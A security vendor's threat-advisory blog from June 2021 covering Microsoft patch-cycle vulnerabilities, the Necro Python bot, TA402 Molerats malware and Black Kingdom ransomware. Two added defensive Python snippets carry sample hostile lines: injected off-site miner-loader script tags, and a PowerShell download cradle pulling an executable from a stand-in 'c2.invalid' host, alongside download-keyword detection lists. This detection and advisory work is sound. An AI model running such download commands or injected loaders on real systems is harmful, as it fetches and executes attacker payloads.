Top Middle East Cyber Threats – 21 June 2021


At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.

In this blog, we share the top cybersecurity threats our MSS team has recently come across. So, read on to learn about what you need to look out for in the weeks ahead:

Microsoft Security Updates – June 2021

Microsoft kicked off its June 2021 patch cycle by releasing updates for 50 critical and important severity vulnerabilities. This patch cycle addressed multiple security issues in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code – Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.

The official notification noted 5 critical and 45 important severity vulnerabilities. Six of the total vulnerabilities, according to Microsoft, are currently being actively exploited, while three are publicly known at the time of release.

The Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerabilities (CVE-2021-31199/CVE-2021-31201) are related to the Adobe Reader bug (CVE-2021-28550) that was listed as under active attack last month. Pairing a privilege escalation with a code execution bug is quite common, and it appears that these two vulnerabilities were the privilege escalation part of those exploits.

In Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2021-33742), viewing specially crafted web content may allow an attacker to execute code on a target system. Because the flaw is in the Trident (MSHTML) engine, several applications, not just Internet Explorer, were affected.

An attacker could exploit the Kerberos AppContainer Security Feature Bypass Vulnerability (CVE-2021-31962) to bypass Kerberos authentication and potentially authenticate to any service principal name (SPN). This vulnerability is the most serious in June, with a CVSS of 9.4.

Another known flaw under active attack this month is the Windows NTFS Elevation of Privilege Vulnerability (CVE-2021-31956). This vulnerability can easily be chained with a similar vulnerability such as CVE-2021-31955, a common technique in which a memory leak is used to obtain the addresses required to escalate privileges.

A browse-and-own bug in the scripting engine and a remote code execution (RCE) vulnerability in SharePoint are among the remaining Critical-rated bugs. The SharePoint bug does not mandate user interaction, but it does necessitate some level of privilege.

There are several patches affecting Office components, the most noticeable of which is the Outlook update. To carry out the compromise, an attacker would need to persuade someone to open a specially crafted file with an affected version of Outlook. A couple of patches for the 3D Viewer and Paint 3D round out the Important severity code execution patches. In addition to the previously mentioned bugs, ten more elevation of privilege (EoP) vulnerabilities are patched this month. Among them, the Desktop Window Manager (DWM) vulnerability CVE-2021-33739 is also widely known and actively exploited.

To escalate privileges, the other EoPs addressed this month require the attacker to run their code on an affected system. These vulnerabilities affect several Windows components, including the Windows Kernel and Microsoft’s Kubernetes tools. This month, seven patches are available to address information disclosure bugs, with the vulnerability (CVE-2021-31955) for the Windows Kernel listed as being actively exploited. All these flaws result in leaks of unknown memory contents. The one exception to this is the information leak in SharePoint (CVE-2021-31965), which could result in the exposure of Personally Identifiable Information (PII).

With the current patch release in June 2021, there are five patches fixing Denial-of-Service (DoS) bugs. The most notable affected components are Hyper-V and Windows Defender (CVE-2021-31977/CVE-2021-31978).

RECOMMENDATIONS

Necro Python Bot Updates

The most recent activity of Necro Bot reveals numerous changes to the bot, including new command and control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel, and SMB-based exploits that were not present in previous variants of the code.

The infection occurs when a vulnerability in one of the targeted applications or operating systems is successfully exploited. The bot targets both Linux distributions and Windows. For the initial infection stage, a Java-based downloader is leveraged. The malware employs a standalone Python interpreter, a malicious script, and an ELF executable created with PyInstaller. The bot connects to a C2 server through IRC and accepts commands pertaining to exploitation, launching Distributed Denial-of-Service (DDoS) attacks, configuration changes, and RAT functionality to download and launch additional code or sniff network traffic in order to exfiltrate the acquired data.

The bot conceals its existence on the system by installing a user-mode rootkit meant to hide the malicious process, as well as malicious registry entries built to ensure that the bot executes every time a user logs on to the infected machine. A substantial portion of the code is devoted to downloading and running the Monero miner XMRig.

On compromised systems, the bot additionally injects code into HTML and PHP files to download and run a JavaScript-based miner from an attacker-controlled server. When the infected web application is opened in a browser, the JavaScript-based Monero miner runs inside the browser's process space.
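The HTML/PHP injection described above is the kind of change a web-root integrity scan can surface. As an added example (not code from the advisory or from the Necro bot), this Python scanner walks a web root and flags HTML/PHP pages that load a script from a host outside an assumed allowlist; the sample files, the allowlisted host and the "miner-loader.invalid" host are constructed.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Assumed allowlist: the only host this site legitimately loads scripts from.
ALLOWED_HOSTS = {"cdn.example.com"}
WEB_EXTS = {".html", ".htm", ".php"}
# Matches the src value of any <script ... src="..."> tag (case-insensitive).
SCRIPT_SRC = re.compile(r'''<script\b[^>]*(?<![\w-])src\s*=\s*["']([^"']+)["']''', re.I)

def find_foreign_scripts(root, allowed_hosts=ALLOWED_HOSTS):
    """Walk a web root and return sorted (relative path, src) pairs for every
    script tag in an HTML/PHP file that loads code from a non-allowlisted host.
    Relative src values (no host) are treated as local and ignored."""
    root = Path(root)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTS:
            continue
        for src in SCRIPT_SRC.findall(path.read_text(errors="replace")):
            host = urlparse(src.strip()).hostname  # None for /local/paths
            if host and host.lower() not in allowed_hosts:
                hits.append((path.relative_to(root).as_posix(), src))
    return hits

# Constructed sample web root: two pages carry an injected loader that pulls
# a script from an off-site host (stand-in for the miner loader), one is clean.
SAMPLE_FILES = {
    "index.html": '<html><head><script src="https://cdn.example.com/app.js"></script>\n'
                  '<script src="//miner-loader.invalid/l.js"></script></head></html>',
    "about.php": "<?php echo 'hi'; ?><SCRIPT SRC='http://miner-loader.invalid/l.js'>"
                 '</SCRIPT><script src="/js/local.js"></script>',
    "clean.html": '<html><script src="/js/local.js"></script></html>',
    "style.css": 'script src="https://ignored.invalid/x.js"',  # not a web page
}

def demo():
    """Write the constructed files to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_FILES.items():
            Path(tmp, name).write_text(body)
        return find_foreign_scripts(tmp)

if __name__ == "__main__":
    for rel, src in demo():
        print(f"{rel}: loads script from non-allowlisted host: {src}")
```

Run it against a real document root by calling find_foreign_scripts(root) with the site's own allowlist; pairing the scan with file modification times narrows the review to recently changed pages.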

The following additional exploits were added to the arsenal of the most recent variants:

Exploited Application   | Version Details                  | Type
VestaCP                 | VestaCP 0.9.8                    | 'v_sftp_licence' Command Injection
ZeroShell               | Version 3.9.0                    | 'cgi-bin/kerbynet' Remote Root Command Injection
SCO OpenServer          | Version 5.0.7                    | 'outputform' Command Injection
Genexis PLATINUM        | Version 4410 2.1 P4410-V2-1.28   | Remote Command Execution vulnerability
OTRS                    | Version 6.0.1                    | Remote Command Execution vulnerability
VMWare vCenter          | Version 6.5 to 7.0               | Remote Command Execution vulnerability
Nrdh.php                | No details available             | Remote Code Execution exploit for an application with no further details available

These observations point to a self-replicating, polymorphic bot that spreads by exploiting server-side software. The report also includes further details on a bot that carries exploits for more than ten different web applications and the SMB protocol.

RECOMMENDATIONS

  • Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
  • Keep antivirus signatures and engines up to date.
  • Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
  • Block the indicators of compromise within the respective security controls organization-wide.

New TA402 Molerats Malware Targets Governments in the Middle East

TA402 – also known as Molerats, APT-C-23, Gaza Hackers Team, Gaza Cybergang, DustySky, Extreme Jackal, and Moonlight – is an Arabic-speaking, politically motivated group that has operated in the Middle East since 2012. Targets include government and government-adjacent organizations in Israel, Palestine, UAE, Turkey, and Egypt.

TA402 leverages political and military themes, including the ongoing conflict in the Gaza Strip, to entice users to open attachments and click on malicious links.

TA402’s custom malware, called LastConn, is used to gain access to targets and conduct information-gathering activities.

LastConn uses a number of unique features to deter automated threat analysis and make manual analysis difficult.

TA402 resumed email threat campaigns in early June 2021 with continued use of LastConn malware. Researchers assess with high confidence LastConn is an updated version of SharpStage malware first reported by Cybereason in December 2020.

The primary motivation of this group is to collect sensitive information and documents from high-value targets in order to gather intelligence.

In June campaigns, TA402 leveraged a PDF attachment with one or multiple geofenced URLs leading to password-protected archives that contained the malware.

RECOMMENDATIONS

  • Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
  • Keep antivirus signatures and engines up to date.
  • Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
  • Block the indicators of compromise within the respective security controls organization-wide.

Black Kingdom ransomware

The use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as ProxyLogon was publicly reported at the end of March.

Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.

Public reports indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.
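The chain described above (webshell on the Exchange server, then a PowerShell download-and-run) leaves a distinctive parent/child trace in process-creation telemetry. As an added example (not from the public reports or the advisory), this Python triage routine grades constructed process-creation events; it assumes that webshell commands on an IIS-hosted Exchange server run as children of the IIS worker process w3wp.exe, and the c2.invalid host is a placeholder, not an indicator from the campaign.

```python
from dataclasses import dataclass

# Assumption: on Exchange, a webshell's commands run as children of the IIS
# worker process w3wp.exe, so a shell spawned from it is itself suspicious.
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings that indicate the shell is fetching a payload from the network.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "start-bitstransfer", "certutil", "curl ", "wget ")

@dataclass
class ProcEvent:
    """Minimal process-creation record (e.g. from Sysmon event ID 1 or EDR)."""
    parent_image: str
    image: str
    command_line: str

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Grade one event: 'critical' = web worker -> shell -> download cradle,
    'high' = web worker spawning a shell at all, otherwise 'benign'."""
    if basename(ev.parent_image) not in WEB_WORKERS or basename(ev.image) not in SHELLS:
        return "benign"
    cmd = ev.command_line.lower()
    return "critical" if any(h in cmd for h in DOWNLOAD_HINTS) else "high"

# Constructed telemetry; c2.invalid is a placeholder host, not a real IoC.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c (New-Object Net.WebClient).DownloadFile("
              "'http://c2.invalid/bk.exe','C:\\Users\\Public\\bk.exe')"),
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Invoke-WebRequest http://intranet.invalid/report"),
    ProcEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
]

def triage(events=SAMPLE_EVENTS):
    """Return (severity, child image name) for every event, in order."""
    return [(classify(e), basename(e.image)) for e in events]
```

Calling triage() on the constructed events grades the first as critical and the second as high, while the same download cmdlet launched from explorer.exe stays benign because the parent is not a web worker.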

RECOMMENDATIONS

  • Prioritize timely patching for identified vulnerabilities of Internet-facing servers as well as internet data processing tools, such as web browsers, application plug-ins, and document readers. Refer to the tips for Understanding Patches and Securing Network Infrastructure Devices from CISA.
  • Keep antivirus signatures and engines up to date.
  • Enable a personal firewall on user workstations, configured to deny unsolicited connection requests.
  • Block the indicators of compromise within the respective security controls organization-wide.
